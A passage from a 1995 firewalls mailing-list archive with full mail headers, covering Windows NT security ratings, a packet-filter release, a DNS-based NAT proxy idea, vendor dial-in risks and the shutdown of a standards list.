miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA14155 for ; Mon, 9 Oct 1995 08:33:02 -0700 Received: from tgate2.mitre.org (tgate2.mitre.org [128.29.154.211]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id LAA18201 for <@mwunix.mitre.org:firewalls@GreatCircle.COM>; Mon, 9 Oct 1995 11:31:44 -0400 Received: from [128.29.250.7:2674] by tgate1 with SMTP id A403984 ; Mon, 9 Oct 95 11:31:31 EDT Received: by mail06.mitre.org; (5.65/1.1.8.2/22Jun94-0628PM) id AA26923; Mon, 9 Oct 1995 11:34:04 -0400 Subject: Re: B2 rated WIndows NT? From: bell@mail06.mitre.org (D. Elliott Bell) To: firewalls@GreatCircle.COM Message-Id: <951009113402.19096@mail06.mitre.org.0> Date: Mon, 9 Oct 95 11:34:04 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Windows NT received its B1 rating late this summer. Not B2. > > > There is not a B Level version currently available. There is a C2 > Version available. Several companies are investigating and some have > started building a B Level version, however. There are B Level network > components available such as TNT DNSIX from Global Internet Software > Group in Monticello, IL: > > > Global Internet Software Group (formerly, Blue Ridge Software, Inc.) > 107 S. State St., P.O. Box 406, Monticello, IL 61856 > 217-762-2375 Fax:-5408 > > > Hope this helps ... > > > > Mark A. Podracky > Sr. Information Security Specialist > Integrated Data Systems > 14170 Newbrook Drive, Suite 201 > Chantilly, VA 22021-2223 > > 703-803-9115 extension 19 > > > > > > ______________________________ Reply Separator _________________________________ > Subject: B2 rated WIndows NT? > Author: Xin LI at ccSMTP > Date: 10/9/95 8:00 AM > > > Hi, there: > > It's said that there is secure version of Windows NT rated B class(probably B2) > available. Does any one > know where can I get more information about that? > > Any advice and information are welcome and very appreciated. > > Thanks in advance, > > > Li, Xin > > Senior System Engineer > NEC Singapore Pte Ltd > No. 1 Maritime Square #12-10 > World Trade Center Tel: > +65-277 -2227 > Singapore, 099253 > Fax:+65-271- 5988 > Republic of Singapore Email: > lixin @wpo.necsin.fc.nec.co.jp > > > > From firewalls-owner Mon Oct 9 09:01:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA14191 for firewalls-outgoing; Mon, 9 Oct 1995 08:34:11 -0700 Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA14184 for ; Mon, 9 Oct 1995 08:34:05 -0700 Received: from tgate2.mitre.org (tgate2.mitre.org [128.29.154.211]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id LAA18334 for <@mwunix.mitre.org:firewalls@GreatCircle.COM>; Mon, 9 Oct 1995 11:32:45 -0400 Received: from [128.29.250.7:2675] by tgate1 with SMTP id A403988 ; Mon, 9 Oct 95 11:32:27 EDT Received: by mail06.mitre.org; (5.65/1.1.8.2/22Jun94-0628PM) id AA26852; Mon, 9 Oct 1995 11:35:00 -0400 Subject: Re: B2 rated WIndows NT? From: bell@mail06.mitre.org (D. Elliott Bell) To: firewalls@GreatCircle.COM Message-Id: <951009113458.19096@mail06.mitre.org.0> Date: Mon, 9 Oct 95 11:35:00 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Fumble fingers mistyped. Read "C2" for "B1" in the preceeding. > > > There is not a B Level version currently available. There is a C2 > Version available. Several companies are investigating and some have > started building a B Level version, however. There are B Level network > components available such as TNT DNSIX from Global Internet Software > Group in Monticello, IL: > > > Global Internet Software Group (formerly, Blue Ridge Software, Inc.) > 107 S. State St., P.O. Box 406, Monticello, IL 61856 > 217-762-2375 Fax:-5408 > > > Hope this helps ... > > > > Mark A. Podracky > Sr. Information Security Specialist > Integrated Data Systems > 14170 Newbrook Drive, Suite 201 > Chantilly, VA 22021-2223 > > 703-803-9115 extension 19 > > > > > > ______________________________ Reply Separator _________________________________ > Subject: B2 rated WIndows NT? > Author: Xin LI at ccSMTP > Date: 10/9/95 8:00 AM > > > Hi, there: > > It's said that there is secure version of Windows NT rated B class(probably B2) > available. Does any one > know where can I get more information about that? > > Any advice and information are welcome and very appreciated. > > Thanks in advance, > > > Li, Xin > > Senior System Engineer > NEC Singapore Pte Ltd > No. 1 Maritime Square #12-10 > World Trade Center Tel: > +65-277 -2227 > Singapore, 099253 > Fax:+65-271- 5988 > Republic of Singapore Email: > lixin @wpo.necsin.fc.nec.co.jp > > > > From firewalls-owner Mon Oct 9 10:31:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA16531 for firewalls-outgoing; Mon, 9 Oct 1995 10:23:13 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA16524 for ; Mon, 9 Oct 1995 10:23:11 -0700 Received: from nahanni.BouletFermat.ab.ca by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id KAA03347; Mon, 9 Oct 1995 10:14:38 -0700 Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id LAA22509 for firewalls@greatcircle.com; Mon, 9 Oct 1995 11:25:08 -0600 Date: Mon, 9 Oct 1995 11:25:08 -0600 From: Danny Boulet Message-Id: <199510091725.LAA22509@nahanni.BouletFermat.ab.ca> To: firewalls@greatcircle.com Subject: New version of ipfirewall with Linux support now available Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The latest version of ipfirewall (v2.0d) is now available via ftp. ipfirewall is an IP packet filtering tool which is similar to the packet filtering facilities provided by most commercial routers. Once the facility has been installed on a host computer, the system administrator defines a set of blocking filters and a set of forwarding filters. The blocking filters determine which packets are to be accepted by the host. The forwarding filters determine which packets are to be forwarded by the host. Each filter describes a class of packets and how they are to be treated (rejected and logged, accepted silently or accepted and logged). Packets can be filtered based on the following characteristics: - type of packet (all IP, TCP, UDP, ICMP) - source and destination IP address (and port number for TCP and UDP) - which network interface it arrived on - whether or not the packet is a TCP/IP connection request (i.e. a packet that is attempting to initiate a TCP/IP session) - whether or not the packet is a head, tail or arbitrary IP fragment - whether or not the packet has certain IP options defined Changes since the last version are: - a bugfix that prevents a vandal from using certain degenerate IP packet fragments to get past certain kinds of filters (registered users of ipfirewall got this bug fix on the day after I received the bug report) - support for Linux (kernel version 1.2 although it probably isn't very hard to incorporate it into other versions) With this version, ipfirewall now supports BSD/OS (including older versions of BSD/386), FreeBSD, Linux and NetBSD. This latest version is available from the following locations: ftp:ftp.bsdi.com//contrib/networking/security/ipfirewall_v2.0d.shar.gz ftp:ftp.nebulus.net//pub/bsdi/security/ipfirewall_v2.0d.shar.gz I can also provide it to you via e-mail as four shar files. If you have any questions, comments or suggestions, please contact me at danny@BouletFermat.ab.ca ipfirewall is distributed on a shareware basis. Registered users receive a bound user's guide in addition to better and faster support (so far, I've managed to provide registered users with a bug fix within 48 hours of any security related bug report). Contact me or look at the README file in the distribution for more details. -Danny From firewalls-owner Mon Oct 9 11:09:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA16825 for firewalls-outgoing; Mon, 9 Oct 1995 10:40:12 -0700 Received: from strydr.strydr.com (strydr.strydr.com [199.217.201.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA16818 for ; Mon, 9 Oct 1995 10:40:07 -0700 Received: (from ds3721@localhost) by strydr.strydr.com (8.6.12/8.6.11) id MAA21572 for firewalls@greatcircle.com; Mon, 9 Oct 1995 12:38:35 -0500 From: David Schnardthorst Message-Id: <199510091738.MAA21572@strydr.strydr.com> Subject: Oracle <-> Firewall To: firewalls@greatcircle.com Date: Mon, 9 Oct 1995 12:38:34 -0500 (CDT) Organization: Stryder Communications, Inc. Address: 869 St. Francois, Florissant, Mo. 63031 Telephone: (314)838-6839 Fax: (314)838-8527 X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 784 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anybody know of a way to get Oracle Information through a Firewall? We are setting up a firewall, with our Web Servers on the outside, however we need to pass some information from an Oracle Database through the firewall to the outside Web Servers. Has anybody done this, and if so, could you please give me some ideas of how to accomplish this. ============================================================================ David Schnardthorst System Administrator * Phone: (314)838-6839 Stryder Communications, Inc. * Fax: (314)838-8527 869 St. Francois * E-Mail: ds3721@strydr.com Florissant, MO 63031 * URL: http://www.strydr.com ============================================================================ From firewalls-owner Mon Oct 9 11:31:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18326 for firewalls-outgoing; Mon, 9 Oct 1995 11:22:17 -0700 Received: from blob.best.net (blob.best.net [204.156.128.88]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA18319 for ; Mon, 9 Oct 1995 11:22:14 -0700 From: yobie@yobie.com Received: from shell1.best.com (shell1.best.com [204.156.128.10]) by blob.best.net (8.6.12/8.6.5) with ESMTP id LAA09835; Mon, 9 Oct 1995 11:20:53 -0700 Received: from best.com (yobie.vip.best.com [204.156.155.53]) by shell1.best.com (8.6.12/8.6.5) with SMTP id LAA23799; Mon, 9 Oct 1995 11:20:50 -0700 Date: Mon, 9 Oct 1995 11:20:50 -0700 Message-Id: <199510091820.LAA23799@shell1.best.com> To: LIXIN@wpo.necsin.fc.nec.co.jp, firewalls@GreatCircle.COM Subject: Re: B2 rated WIndows NT? X-Mailer: ProntoIP [version 1.0] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Microsoft has just announced that NT 3.1 is now officially certified by the US NSA as C2 compliant. yobie@yobie.com yobie@msn.com yobie@well.sf.ca.us 102262.2260@compuserve.com yobie@best.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQINAzBWg18AAAEQANnXKRohQlsdi+E2pVGH9/0ljIJFwg6TCQQ37Lcv8LfIR1RP FbwXDfMAWtRKQkYtHUa18png/qMlDJeaethHDaotRMuhUtDpvWxLH7HmWyJ6sz78 ZHN3/ddtLrzrb+fYgjXhBnkSckmxwNQ8o1k4E45UvWGL2BzldVeOKmmBHjI8hgxX lgPAw+Ozl2JESYvRjj3OT1jHFGlri/Hzvd/D7kbkhF6eMcCotX1h6ZcoTUka5qqh PzKr04zCzQrw0z/Qy5St1gA2gB40mwsxICnrLo7y0fXilFT0qtQI+bj2pV2rfPhe KQYXLHuL3Hrv8vUhciPtNrS3iPESTsIeADZ3r+0g6RJ1XDkZ1P9iaM4S6TRjugw1 CmBaj9rpkJ79MV235n3a0q6ZlWMzhPJ5yz+kt2UdBMeeWXT5eV+AB0tfgYUt9Mss G8/h+m8FypdxKlEs/9e3PtROmoIm2OXKUEFzY9Cl6Ew0nisCXyPYtuRRrC7w6EWR oj5WItiIdZvbN9GmTJ5seBA2TwAxKcDw7LEieaItCcUsG955jbagOaptBOPSUrv8 LJA40PIPgXpXP+SEJiL9wJQ5TGvkAsZkw+X9z26c9chImPy5A7qCZy3R/XZYu0Hc OCd2zQnjzw87LKfIhJ3LDHMZADBdLvVdFfCd4EihjldGdzGzoQJ1FGhpIpSRAAUT tCBZb2JpZSBCZW5qYW1pbiA8eW9iaWVAeW9iaWUuY29tPg== =9HBa -----END PGP PUBLIC KEY BLOCK----- From firewalls-owner Mon Oct 9 12:01:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18731 for firewalls-outgoing; Mon, 9 Oct 1995 11:45:38 -0700 Received: from bramber.windsor.com (bramber.windsor.com [199.181.96.54]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA18723 for ; Mon, 9 Oct 1995 11:45:31 -0700 Received: (from erics@localhost) by bramber.windsor.com (8.6.12/8.6.12) id OAA00130; Mon, 9 Oct 1995 14:44:11 -0400 From: "Eric V. Smith" Message-Id: <199510091844.OAA00130@bramber.windsor.com> Subject: Re: Network Address Translation stuff To: paul@vix.com (Paul A Vixie) Date: Mon, 9 Oct 1995 14:44:11 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9510061801.AA28453@wisdom.home.vix.com> from "Paul A Vixie" at Oct 6, 95 11:01:13 am Reply-To: EricSmith@windsor.com X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 2506 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul A Vixie wrote: > > > The trick is to use an FTP proxy without the client having to know that > > > it's talking to an FTP proxy. With a simple DNS trick and a complicated > > > FTP proxy, you can make these ends meet. > > > > Could you explain this in a little more detail? > > Assume an RFC 1597 net which cannot exchange packets with the outside world. > Everything a host on the internal net does, it does with other internal hosts > or with some kind of fancy border gateway. This includes name service. > > Assume that the name server is smart enough to answer "creatively" when asked > certain questions by internal hosts about external hosts. The border gateway > makes the assumption that the time between asking for a remote host's address > and attempting to connect to that address will be relatively short, and that > these events are for the most part paired (other than as provided for by DNS > caching on intermediate internal name servers.) > > Assume that the addresses given back by our "creative" border name server will > refer to internal addresses (probably using alias interfaces) on some border > machine, and that border machine has the "socket" command available, and that > DNS replies can be made to coincide with execution of "socket" commands. > > Assume that for protocols which do not contain addresses within them, such as > telnet, the above is all that's required. In other cases, like SMTP where the > internal hostnames may not be mappable by an external SMTP server, an applic- > ation layer gateway (like sendmail running as a mail relay) will be used. In > the case of FTP, the application layer gateway is fired up by the creative DNS > server and it is given the desired remote host name/address mappings needed to > complete the transaction even though the internal FTP client's TCP connection > has "ended" at the border. < sorry for the long quotation, but I thought it was all needed, and some may have forgotten the subject matter > Doesn't this assume that the smart DNS server knows which of these protocols is being requested for each address, so that it knows which proxy to start up on the socket it created? Or am I missing something? -- Eric V. Smith | Some for renown on scraps of learning dote, EricSmith@windsor.com | And think they grow immortal as they quote. Windsor Software Corp +----------------------------------+ Edward Young http://www.windsor.com/ Windows NT, Unix, SQL Server | English poet From firewalls-owner Mon Oct 9 12:31:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA19538 for firewalls-outgoing; Mon, 9 Oct 1995 12:14:18 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA19531 for ; Mon, 9 Oct 1995 12:14:15 -0700 Received: by gw.home.vix.com id AA20413; Mon, 9 Oct 95 12:12:55 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA30560; Mon, 9 Oct 1995 12:12:55 -0700 Message-Id: <9510091912.AA30560@wisdom.home.vix.com> To: firewalls@greatcircle.com Subject: Re: Network Address Translation stuff In-Reply-To: Your message of "Mon, 09 Oct 1995 14:44:11 EDT." <199510091844.OAA00130@bramber.windsor.com> Date: Mon, 09 Oct 1995 12:12:55 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Doesn't this assume that the smart DNS server knows which of these > protocols is being requested for each address, so that it knows which > proxy to start up on the socket it created? Or am I missing something? > -- > Eric V. Smith yes, or it requires a kernel with a preemptive icmp socket. From firewalls-owner Mon Oct 9 12:36:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA19140 for firewalls-outgoing; Mon, 9 Oct 1995 12:02:22 -0700 Received: from nav.cc.tx.us (nav.cc.tx.us [192.152.226.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA19133 for ; Mon, 9 Oct 1995 12:02:18 -0700 Received: by nav.cc.tx.us (AIX 3.2/UCB 5.64/4.03) id AA54553; Mon, 9 Oct 1995 14:03:41 -0500 Date: Mon, 9 Oct 1995 14:03:41 -0500 (CDT) From: Dana Brewer To: Danny Boulet Cc: firewalls@greatcircle.com Subject: Firewall on RS/6K In-Reply-To: <199510091725.LAA22509@nahanni.BouletFermat.ab.ca> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We're looking into installing a "firewall" on our RS/6k. We don't have the budget to buy any of the software packages that I see mentioned on this list. What are some of the things that we can do cheaply (free is even better) to make the machine more secure? ************************************************************************** Dana Brewer Director, Computer Center Internet: dana@nav.cc.tx.us Navarro College Phone : 903-874-6501 3200 W. 7th Ave. FAX : 903-874-4636 Corsicana, TX 75110 ************************************************************************** From firewalls-owner Mon Oct 9 13:31:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA22084 for firewalls-outgoing; Mon, 9 Oct 1995 13:10:11 -0700 Received: from iss.net (iss.iss.net [204.241.60.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA22077 for ; Mon, 9 Oct 1995 13:10:07 -0700 Received: (from cklaus@localhost) by iss.net (8.6.4/8.6.4) id QAA16898 for firewalls@greatcircle.com; Mon, 9 Oct 1995 16:06:11 -0700 From: Christopher Klaus Message-Id: <199510092306.QAA16898@iss.net> Subject: Announcement: Alert Mailing List To: firewalls@greatcircle.com Date: Mon, 9 Oct 1995 16:06:10 +1494730 (PDT) X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2229 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk (YAML - yet another mailing list ;-) ) Announcing a new security mailing list - The Alert. The Alert will be covering the following topics: - Security Product Announcements - Updates to Security Products - New Vulnerabilities found - New Security Frequently Asked Question files. - New Intruder Techniques and Awareness To join, send e-mail to request-alert@iss.net and, in the text of your message (not the subject line), write: subscribe alert To remove, send e-mail to request-alert@iss.net and, in the text of your message (not the subject line), write: unsubscribe alert This is a moderated list in the effort to keep the noise to a minimal and provide quality security information. If your site is interested in network security, we put out several FAQes (Frequently Asked Question) that cover the following main areas of topic: Vendor Contacts - Who is the security contacts at IBM, HP, Dec, Motorola, etc. - Web page at: http://iss.net/iss/vendor.html Patches - List of all security related patches catergorized by OS type. - Web page at: http://iss.net/iss/patch.html Compromise - Check list of things to do if your machines are compromised. - Web page at: http://iss.net/iss/compromise.html Anonymous FTP Security - How to correctly set up FTP and check for vulnerabilities. - Web page at: http://iss.net/iss/anonftp.html Sniffers - What they are. How they work. How to detect them. And solutions. - Web page: http://iss.net/iss/sniff.html Security Mailing Lists - A comprehensive list of security mailing lists. - Web page: http://iss.net/iss/maillist.html If possible, it might be a good idea for you to add links to the above web pages on your own Web server and point people who need to know some of the network security issues to the web page. It is possible to point to all of the FAQ pages at: http://iss.net/iss/faq.html -- Christopher William Klaus Voice: (770)441-2531. Fax: (770)441-2431 Internet Security Systems, Inc. "Internet Scanner lets you find 2000 Miller Court West, Norcross, GA 30071 your network security holes Web: http://iss.net/ Email: cklaus@iss.net before the hackers do." From firewalls-owner Mon Oct 9 14:02:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23116 for firewalls-outgoing; Mon, 9 Oct 1995 13:43:21 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA23108 for ; Mon, 9 Oct 1995 13:43:17 -0700 Received: from pm3-18.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA10851; Mon, 9 Oct 95 15:40:02 -0400 Date: Mon, 9 Oct 95 15:40:02 -0400 Message-Id: <9510091940.AA10851@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Edward Maillet From: frankw@in.net (Frank Willoughby) Subject: Re: Vendor Dial-in Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You brought up a good point - and a question that is seldom raised. In the hurry to get problems solved quickly, many people don't go to the trouble to think about the "what ifs" involved when vendors dial-in to their systems / networks. Hats off to you for forward thinking. I have had to deal with this problem a number of times in a previous life, and in a nutshell, I would be *extremely* cautious about letting *any* vendor log into my network to solve anything. You have no way of knowing (or verifying) how secure the vendor's network is, or who the person is (could be a hacker with a daytime job). (Also, if the other company had a worm running loose on their network and you connect the two networks together...). 8^( In almost all situations, there are alternatives. I would recommend finding one that avoids having the vendor log in or at the very least restrict things so much that the damage is contained. A few possible ways of handling the situation (in no particular order). 1) "Sorry, but our policy doesn't allow dial-in connections". Probably won't work, but it's worth a try. The other company might even suggest alternatives. If they want your business, they will work with you on this. If they balk, ask to log onto their network. 8^) 2) Troubleshoot the problem over the phone (like most helpdesks do). This assumes that the person performing the actions understands the technical ramifications of what they are doing. 3) The PC Anywhere idea was pretty good, but have fun trying to find someone to monitor the keystrokes at 2am. Also, they person doing the monitoring may not necessarily understand what the vendor is doing and would not be in a position to detect/prevent unauthorized or malicious activities. Aside from that, it is a good idea. (Friendly greetings back to Holland) 8^) 4) Create a copy of the system to be troubleshot, throw it on an isolated LAN (with no other systems on it, disconnect it from all other networks), and provide a secure dial-in service. Don't forget to tape up and mark the ends of the cables so that no one accidentally connects the isolated LAN to your internal LAN. Any damage is contained to the system / isolated LAN. 5) Have them appear on-site to solve the problem. <== My favorite as the person can be identified/authenticated. 6) In all cases mentioned above, the vendor should have signed the appropriate NDA, Confidentiality, and Liability forms. The forms should be appropriately worded (similar to the infamous s/w license agreements, but with the deck stacked in your favor). Put it in writing that if anything happens, that they are responsible for reinbursing you for all expenses & damages, system rebuilds, etc. 7) Tap the incoming line and have the output go to a printer (after writing the date/time started and initialling it). Just remember that the printout must be interpreted in the proper context of when the commands are given. (There are ways to get around this, but not in a public forum). 8) FTP the log files to them & FTP the solution from them. All of the above depends on the value of what you are protecting, and how much management support you will receive in your wise decision to restrict dial-in connections. If it was me, I wouldn't let the dial-in connection happen if there was any alternative. Best Regards, Frank From firewalls-owner Mon Oct 9 14:31:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA23939 for firewalls-outgoing; Mon, 9 Oct 1995 14:18:38 -0700 Received: from bramber.windsor.com (bramber.windsor.com [199.181.96.54]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA23932 for ; Mon, 9 Oct 1995 14:18:35 -0700 Received: (from erics@localhost) by bramber.windsor.com (8.6.12/8.6.12) id RAA03630; Mon, 9 Oct 1995 17:17:12 -0400 From: "Eric V. Smith" Message-Id: <199510092117.RAA03630@bramber.windsor.com> Subject: Re: Network Address Translation stuff To: paul@vix.com (Paul A Vixie) Date: Mon, 9 Oct 1995 17:17:12 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9510091912.AA30560@wisdom.home.vix.com> from "Paul A Vixie" at Oct 9, 95 12:12:55 pm Reply-To: EricSmith@windsor.com X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 832 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul A Vixie wrote: > > > Doesn't this assume that the smart DNS server knows which of these > > protocols is being requested for each address, so that it knows which > > proxy to start up on the socket it created? Or am I missing something? > > yes, or it requires a kernel with a preemptive icmp socket. Sorry, I didn't make my question obvious. How does the DNS server know if a request for the name foo.bar.com is for FTP, telnet, finger, or whatever? I assume it could tell SMTP by an MX request, but what about the others? -- Eric V. Smith | Some for renown on scraps of learning dote, EricSmith@windsor.com | And think they grow immortal as they quote. Windsor Software Corp +----------------------------------+ Edward Young http://www.windsor.com/ Windows NT, Unix, SQL Server | English poet From firewalls-owner Mon Oct 9 15:00:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA24725 for firewalls-outgoing; Mon, 9 Oct 1995 14:45:09 -0700 Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA24718 for ; Mon, 9 Oct 1995 14:45:05 -0700 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id RAA00711 for firewalls@greatcircle.com; Mon, 9 Oct 1995 17:44:07 -0400 From: "Marcus J. Ranum" Message-Id: <199510092144.RAA00711@switchblade.iwi.com> Subject: firewalls-standards shutdown - To: firewalls@greatcircle.com Date: Mon, 9 Oct 1995 17:44:07 -0400 (EDT) Reply-To: mjr@iwi.com Organization: Information Warehouse! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 950 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Who says mailing lists never die? :) The firewalls-standards mailing list is now officially defunct. There was a technical accident in the majordomo server that wound up zapping the subscription and nobody noticed. Because the list has been completely silent. So we've decided it's time for a merciful bullet. I confess in retrospect that I'm somewhat perplexed at the way the list died. I guess it's a good sign of a dynamic industry that growth and technological advance is still more interesting than standards and methods. If you look at the archive, 90% of the discussion was about performance measures. So at least we've learned that that was a "hot issue" although it's apparently still not hot enough for anyone to bother actually going and scientifically measuring firewalls. Thanks to all who participated! It was worth at least trying, to see what the issues were. mjr. From firewalls-owner Mon Oct 9 15:31:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA25838 for firewalls-outgoing; Mon, 9 Oct 1995 15:20:21 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA25831 for ; Mon, 9 Oct 1995 15:20:17 -0700 Date: Mon, 9 Oct 1995 18:18:58 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951009181858.2106567f@hobbes.orl.mmc.com> Subject: B2 rated Windoze NT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Microsoft has just announced that NT 3.1 is now officially certified by >the US NSA as C2 compliant. But was it certified while connected to a network ? In fact, I wonder if it even had a NIC installed (have not gotten the new catalog yet). Suspect someone here (Baltimore) this week will know... Warmly, Padgett From firewalls-owner Mon Oct 9 16:31:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA27038 for firewalls-outgoing; Mon, 9 Oct 1995 16:01:27 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA27031 for ; Mon, 9 Oct 1995 16:01:24 -0700 Received: from pm2-25.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA17727; Mon, 9 Oct 95 17:58:09 -0400 Date: Mon, 9 Oct 95 17:58:09 -0400 Message-Id: <9510092158.AA17727@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: mjr@iwi.com From: frankw@in.net (Frank Willoughby) Subject: Re: firewalls-standards shutdown - Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus, I personally feel that it was an excellent idea. However, I think where the project may have gotten bogged down is that some companies may have felt that participating in the standards mailing list would either have been an admission of inadequacy if something was posted that they didn't have, or it may have given hints about products under development, or someone from one company may make a suggestion only to see a competitor reach the market first. The same things happen at IEEE standards meetings. Best Regards, Frank From firewalls-owner Mon Oct 9 17:00:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA28218 for firewalls-outgoing; Mon, 9 Oct 1995 16:55:18 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA28206 for ; Mon, 9 Oct 1995 16:55:08 -0700 Date: Mon, 9 Oct 95 19:49 EDT From: Wilner@DOCKMASTER.NCSC.MIL Subject: Re: new firewall book (Chapman & Zwicky) To: firewalls@GREATCIRCLE.COM Message-ID: <951009234916.486639@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hannan writes: > True, both of these [high-assurance trusted platforms or > formal modeling of TCP/IP protocols] are required knowledge > for firewalling, and also subsets of firewall theory. My learned colleague's assertion speaks for itself. From firewalls-owner Mon Oct 9 17:01:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA28178 for firewalls-outgoing; Mon, 9 Oct 1995 16:54:55 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA28170 for ; Mon, 9 Oct 1995 16:54:49 -0700 Date: Mon, 9 Oct 95 19:42 EDT From: Wilner@DOCKMASTER.NCSC.MIL Subject: Re: B2 rated WIndows NT? To: firewalls@GREATCIRCLE.COM Message-ID: <951009234245.245397@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > It's said that there is a [B2-secure Windows NT] available. > Does any one know where can I get more information about that? Don't believe it. Microsoft has neither the inclination nor the experience to satisfy the rigorous design and documentation requirements to merit such a rating. I have certainly heard many, many stories about Microsoft's forays into the world of trusted computing. I have not seen any evidence personally. The best POC that I know of at this time is Ken Moss, 206-936-7774. Come to think of it, the area code may have changed to 360. From firewalls-owner Mon Oct 9 19:00:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01005 for firewalls-outgoing; Mon, 9 Oct 1995 18:40:13 -0700 Received: from hestia.ccs.deakin.edu.au (hestia.ccs.deakin.edu.au [128.184.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA00990 for ; Mon, 9 Oct 1995 18:40:07 -0700 Received: from mensa.ccs.deakin.edu.au (mensa.ccs.deakin.edu.au [128.184.102.1]) by 